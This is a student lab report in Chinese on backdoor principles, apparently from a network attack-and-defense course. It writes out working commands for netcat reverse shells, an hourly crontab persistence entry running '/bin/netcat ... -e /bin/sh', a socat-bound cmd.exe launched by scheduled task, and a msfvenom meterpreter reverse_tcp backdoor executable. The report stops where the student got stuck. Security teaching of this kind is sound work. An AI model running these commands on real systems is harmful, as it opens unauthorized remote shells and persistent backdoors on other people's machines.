#20155235 《网络攻防》 实验二 后门原理与实践

20155235 《网络攻防》 实验二 后门原理与实践

实验目的

建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识 。

实验内容

(1)使用netcat获取主机操作Shell,cron启动

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?
优盘里带有有后门的文件,插到电脑上把文件移到电脑中。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
win:网页上的相关链接
Linux:实验中用到的ncat等
(3)Meterpreter有哪些给你映像深刻的功能?
画图
(4)如何发现自己有系统有没有被安装后门?
定时查看端口有无可疑的连接吧

实验一 NC 或 netcat

任务一 Windows获得Linux Shell

步骤1:在Windows系统使用ipconfig指令查看本机IP;使用ncat.exe程序监听本机的5235端口
步骤2:在Kali系统中使用nc指令的-e选项反向连接Windows主机的5235端口
步骤3:在Windows下成功运行Kali的shell,运行ls指令后,整体截图如下

任务二 Linux获得Windows Shell

实验过程中出现了一些小问题:

任务三使用nc传输数据

步骤1:在Windows下监听5235端口
步骤2:在Kali下连接到Windows的5235端口:
步骤3:建立之后进行文字传输,后面会用来传输后门

任务四使用netcat获取主机操作Shell

步骤1:在Windows系统下监听5235端口。
步骤2:在kali下用crontab -e指令编辑一条定时任务,选择编辑器时选择3 basic vim编辑器。
步骤3:在最后一行添加 15 * * * * /bin/netcat 169.254.1.140 5235 -e /bin/sh ,即在每个小时的第15分钟反向连接Windows主机的5235端口。

任务五使用socat获取主机操作Shell

步骤1:在Windows系统下,打开控制面板下搜索任务计划开始创建任务,填写任务名称后,新建一个触发器
步骤2:在操作->程序或脚本中选择socat.exe文件的路径,在添加参数一栏填写 tcp-listen:5235 exec:cmd.exe,pty,stderr ,这个命令的作用是把cmd.exe绑定到端口5235,同时把cmd.exe的stderr重定向到stdout上,创建好后,直接运行
步骤3:此时,在Kali环境下输入指令socat - tcp:192.168.1.104:5216,这里的第一个参数-代表标准的输入输出,使第二个流连接到Windows主机的5216端口,此时可以发现已经成功获得了一个cmd shell:

任务六使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

步骤1:输入指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.43 LPORT=5235 -f exe > 20155235_backdoor.exe 生成后门程序。

步骤2:通过nc指令将生成的后门程序传送到Windows主机上。
在kali端使用命令: nc 192.168.43.43 5235 < 20155235_backdoor.exe 传送程序。
在windows端使用命令: ncat.exe -l 5235 > 20155235_backdoor.exe 接受程序。
步骤3:在Kali上使用 msfconsole 指令进入msf控制台,输入命令 use exploit/multi/handler 使用监听模块,使用命令 set payload windows/meterpreter/reverse_tcp 设置payload,设置反弹回连的IP(kali的IP)和端口:



目前我就卡在了这一步,按照教程,后面的那两条怎么也不出来,现在还没有解决办法

原文地址:https://www.cnblogs.com/WYjingheng/p/8710999.html